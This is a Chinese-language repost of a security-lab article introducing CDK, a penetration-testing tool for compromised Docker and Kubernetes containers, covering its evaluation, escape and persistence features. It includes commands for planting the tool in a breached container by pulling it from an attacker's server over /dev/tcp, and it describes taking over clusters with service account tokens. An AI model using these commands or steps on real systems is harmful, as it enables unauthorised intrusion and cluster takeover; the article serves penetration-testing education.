Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >云安全容器安全扫盲 之 CDK工具介绍与使用

云安全容器安全扫盲 之 CDK工具介绍与使用

作者头像
Ms08067安全实验室
发布于 2022-04-06 13:47:44
发布于 2022-04-06 13:47:44
3.3K00
代码可运行
举报
运行总次数:0
代码可运行

文章来源|MS08067 安全实验室

声明:

MS08067安全实验室不会对圈内任何机构、公司发起任何舆论攻击、诋毁。也欢迎各界朋友各种形式的合作!

CDK是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。集成Docker/K8s场景特有的 逃逸、横向移动、持久化利用方式,插件化管理。

GitHub地址:

https://github.com/cdk-team/CDK/

CDK 功能

CDK包括三个功能模块

Evaluate: 容器内部信息收集,以发现潜在的弱点便于后续利用。

Exploit: 提供容器逃逸、持久化、横向移动等利用方式。

Tool: 修复渗透过程中常用linux命令以及与Docker/K8s API交互命令。

使用场景

伴随着容器技术的快速发展,容器安全问题也逐渐成为企业所关注的话题。

针对容器场景的渗透测试一方面要求攻击者理解对Docker/K8s以及云服务的原理、特性以及漏洞利用方式;另一方面,攻击者通过业务漏洞(如WEB RCE)攻入容器后往往面对的是一个缩减后的容器环境,缺乏常用的linux命令依赖导致渗透效率不佳。

CDK为安全测试人员提供了golang原生的容器环境渗透能力,主要以下几点:

评估容器内部弱点、搜集敏感信息。

提供多种容器逃逸的漏洞利用方式。

提供K8s环境的多种持久化、横向移动方式。

提供原生的进程、网络命令,便于测试者自定义攻击操作。

技巧:在真实渗透中如何通过漏洞exploit向容器中投递CDK

如果你的漏洞利用过程允许上传文件,即可直接植入CDK。 如果你可以在目标容器中执行命令(RCE),但容器中没有wget或curl命令,可以参考下面方法植入:

将CDK下载到你的公网服务器,监听端口:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
nc -lvp 999 < cdk

在已攻入的目标容器中执行:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
cat < /dev/tcp/Your IP/Your prot > cdk
chmod a+x cdk

使用方法

Evaluate: 容器内部信息收集

[本地信息收集-系统信息]

[本地信息收集-环境变量,敏感进程,服务]

[本地信息收集-可用命令,特权容器]

如果是以特权模式启动的话,CapEff对应的掩码值应该为0000003fffffffff

[本地信息收集-容器挂载]

利用:Procfs目录挂载逃逸

https://github.com/cdk-team/CDK/wiki/Exploit:-mount-procfs

[本地信息收集-网络namespace隔离]

判断容器是否与宿主机共享Net Namespace, 如果docker以--net=host启动且containerd-shim存在虚拟unix socket时,可通过CVE-2020-15257进行逃逸。

[网络信息收集-K8s API Server]

检查ENV信息判断当前容器是否属于K8s Pod,获取K8s api-server连接地址并尝试匿名登录,如果成功意味着可以直接通过api-server接管K8s集群。

[网络信息收集-K8s Service Account 认证凭据]

K8s集群创建的Pod中,容器内部默认携带K8s Service Account的认证凭据

(/run/secrets/kubernetes.io/serviceaccount/token)

CDK将利用该凭据尝试认证K8s api-server服务器并访问高权限接口,如果执行成功意味着该账号拥有高权限,就可以直接利用Service Account 接管K8s集群。

[网络信息收集-云厂商内置Metadata API]

探测云厂商内置的Metadata接口,从该接口可以获取到服务器VM的基础信息如OS版本、CPU及网络、DNS配置等,少数情况下可以发现用户在Metadata中自定义的信息。

Evaluate术语

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
[Information Gathering - Services]
[Information Gathering - Commands and Capabilities]
[Information Gathering - Mounts]
[Information Gathering - Net Namespace]
[Information Gathering - Sysctl Variables]
[Discovery - K8s API Server]
[Discovery - K8s Service Account]
[Discovery - Cloud Provider Metadata API]

腾讯云、阿里云、实例云数据概述:

https://www.alibabacloud.com/help/zh/doc-detail/49122.htm

https://cloud.tencent.com/document/product/213/4934

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-03-23,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Ms08067安全实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
404星链计划 | CDK:一款针对容器场景的多功能渗透工具
CDK是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。集成Docker/K8s场景特有的 逃逸、横向移动、持久化利用方式,插件化管理。
Seebug漏洞平台
2021/11/17
1.1K0
404星链计划 | CDK:一款针对容器场景的多功能渗透工具
【K8s安全】集群信息收集一篇通
需要下载kubectl到pod中,之后通过执行以下命令来获取node节点的内核版本信息
Al1ex
2023/05/12
5420
【K8s安全】集群信息收集一篇通
Kubernetes云原生安全渗透学习
Kubernetes简称k8s,是当前主流的容器调度平台,被称为云原生时代的操作系统。在实际项目也经常发现厂商部署了使用k8s进行管理的云原生架构环境,在目前全面上云的趋势,有必要学习在k8s环境的下的一些攻击手法,本文非常适合刚入门或者准备学习云安全方向的安全人员,每个步骤都是亲手复现整理。文中如有错误的地方,还望各位大佬在评论区指正。
王先森sec
2023/04/24
1.8K0
Kubernetes云原生安全渗透学习
发现一款容器逃逸漏洞利用神器!
有在关注容器逃逸漏洞,最近在github上发现了一款零依赖Docker/K8s渗透工具包,集成了多个漏洞PoC/EXP,可轻松逃脱容器并接管K8s集群。
Bypass
2021/01/05
1.6K0
发现一款容器逃逸漏洞利用神器!
云上攻防-云原生篇&Docker安全&系统内核&版本漏洞&CDK自动利用&容器逃逸
细节部分在权限提升章节会详解,常用: CVE-2016-5195 CVE-2019-16884 CVE-2021-3493 CVE-2021-22555 CVE-2022-0492 CVE-2022-0847 CVE-2022-23222
没事就要多学习
2024/07/18
1680
云上攻防-云原生篇&Docker安全&系统内核&版本漏洞&CDK自动利用&容器逃逸
【云原生攻防研究】云原生环境渗透相关工具考察
「云原生」生态正在迅速发展壮大,而专门针对云原生环境下的渗透测试进行介绍的资料却并不丰富。
绿盟科技研究通讯
2020/06/30
1.5K0
HITB AMS 2021 议题分析与学习,感叹华人真多
最近也看到一些微博或公众号提到HITB会议的一些议题,就是分享链接,但还没人聊过里面的议题,今天我又批量下载议题pdf学习下。老规矩,聊聊一些自己感兴趣的话题。
泉哥
2021/07/05
1.2K0
红蓝对抗中的云原生漏洞挖掘及利用实录
2020年年末的时候,我们于CIS2020上分享了议题《Attack in a Service Mesh》讲述我们在近一年红蓝对抗演练中所遇到的云原生企业架构以及我们在服务网格攻防场景沉淀下来的一些方法论。回顾近几年腾讯蓝军在云原生安全上的探索和沉淀,我们在2018年的时候开始正式投入对Serverless和容器编排技术在攻防场景的预研,并把相关的沉淀服务于多个腾讯基础设施和产品之上,而在近期内外部的红蓝对抗演练中腾讯蓝军也多次依靠在云原生场景上的漏洞挖掘和漏洞利用,进而突破防御进入到内网或攻破核心靶标;特别是2020年度的某云安全演习更是通过云原生的安全问题才一举突破层层对抗进入内网。
腾讯安全应急响应中心
2021/03/02
1.6K0
红蓝对抗中的云原生漏洞挖掘及利用实录
Kubernetes 安全大揭秘:从攻击面剖析到纵深防御体系构建(上)
在云原生技术席卷全球的今天,Kubernetes(K8s)已成为容器编排领域的事实标准。据CNCF 2023年调查报告显示,96%的受访企业正在或计划使用Kubernetes,其覆盖场景从核心业务系统到边缘计算节点无所不包。然而,随着K8s的普及,其暴露的安全问题也愈发严峻。
星尘安全
2025/02/25
2840
Kubernetes 安全大揭秘:从攻击面剖析到纵深防御体系构建(上)
【容器集群安全】一文搞定K8s集群信息收集(2)——内部信息收集
本文在Al1ex大佬文章的基础上进一步细化补充了各个部分内容,使其更加适合小白入门学习。
zhouzhou的奇妙编程
2025/02/04
1380
每周云安全资讯-2023年第8周
1 钓鱼网站“潜伏”谷歌广告,窃取亚马逊用户账密 Bleeping Computer 网站披露,一个新的网络犯罪活动将钓鱼网站隐藏在谷歌搜索结果中,以窃取亚马逊网络服务(AWS)用户的登录凭据。 https://mp.weixin.qq.com/s/HgWZ9WOZbtZ3IjX-8G42ng 2 利用Azure AD Kerberos票据,实现到云端的横向移动 在渗透测试过程中,如果获取域管理员权限并且当前存在一个云环境,那么整个 Azure 云仍然可能受到损害。在这篇博客中,将带您了解这个场景,并向您展
云鼎实验室
2023/02/20
1.1K0
每周云安全资讯-2023年第8周
实战记录 | 自主搭建的三层网络域渗透靶场
假期马上结束了,闲暇之时我自己尝试着搭建了一个内网渗透的靶场。靶场是根据比较新的漏洞进行搭建的,质量自以为还可以。
HACK学习
2021/03/21
5.1K1
带你玩转docker容器逃逸
Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中,然后发布到任何流行的 Linux或Windows操作系统的机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口。
Khan安全团队
2023/11/28
2.3K0
Docker容器逃逸
由于传播、利用本公众号亿人安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号亿人安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
亿人安全
2023/12/25
7460
Docker容器逃逸
Docker逃逸CVE-2019-5736、procfs云安全漏洞复现,全文5k字,超详细解析!
procfs是展示系统进程状态的虚拟文件系统,包含敏感信息。直接将其挂载到不受控的容器内,特别是容器默认拥有root权限且未启用用户隔离时,将极大地增加安全风险。因此,需谨慎处理,确保容器环境安全隔离。
小羽网安
2024/07/06
8040
404星链计划 | 攻防演练必备之开源攻击与利用工具盘点
dperf 是一个100Gbps的网络性能与压力测试软件。国内多个知名安全厂商用dperf测试其防火墙。知名开源四层负载均衡DPVS在用dperf做性能测试,发布性能测试报告。
Seebug漏洞平台
2023/08/21
6260
404星链计划 | 攻防演练必备之开源攻击与利用工具盘点
5000字解析:实战化场景下的容器安全攻防之道
在这个数字化转型关键时期,以容器为代表的云原生技术凭借自身的优势,正在逐渐成为核心IT基础设施。云原生已经不再是少部分“创新者”的特权,而是成为了市场主流选择,容器、容器云逐渐成为工作负载的主流形态。
Khan安全团队
2022/07/13
9570
5000字解析:实战化场景下的容器安全攻防之道
9 个容器环境安全红队常用手法总结
随着云原生的火热,容器及容器编排平台的安全也受到了行业关注,Gartner在近期发布的《K8s安全防护指导框架》中给出K8s安全的8个攻击面,总结如下:
iMike
2021/12/18
1.3K0
9 个容器环境安全红队常用手法总结
【云原生攻防研究】容器逃逸技术概览
近年来,容器技术持续升温,全球范围内各行各业都在这一轻量级虚拟化方案上进行着积极而富有成效的探索,使其能够迅速落地并赋能产业,大大提高了资源利用效率和生产力。随着容器化的重要甚至核心业务越来越多,容器安全的重要性也在不断提高。作为一项依然处于发展阶段的新技术,容器的安全性在不断地提高,也在不断地受到挑战。与其他虚拟化技术类似,在其面临的所有安全问题当中,「逃逸问题」最为严重——它直接影响到了承载容器的底层基础设施的保密性、完整性和可用性。
绿盟科技研究通讯
2020/02/25
3.2K0
【云原生攻防研究】容器逃逸技术概览
云上攻防-云原生篇&Kubernetes&K8s安全&API&Kubelet未授权访问&容器执行
Kubernetes是一个开源的,用于编排云平台中多个主机上的容器化的应用,目标是让部署容器化的应用能简单并且高效的使用, 提供了应用部署,规划,更新,维护的一种机制。其核心的特点就是能够自主的管理容器来保证云平台中的容器按照用户的期望状态运行着,管理员可以加载一个微型服务,让规划器来找到合适的位置,同时,Kubernetes在系统提升工具以及人性化方面,让用户能够方便的部署自己的应用。 1、Master节点 2、Node节点 3、Pod
没事就要多学习
2024/07/18
2140
云上攻防-云原生篇&Kubernetes&K8s安全&API&Kubelet未授权访问&容器执行
推荐阅读
相关推荐
404星链计划 | CDK:一款针对容器场景的多功能渗透工具
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验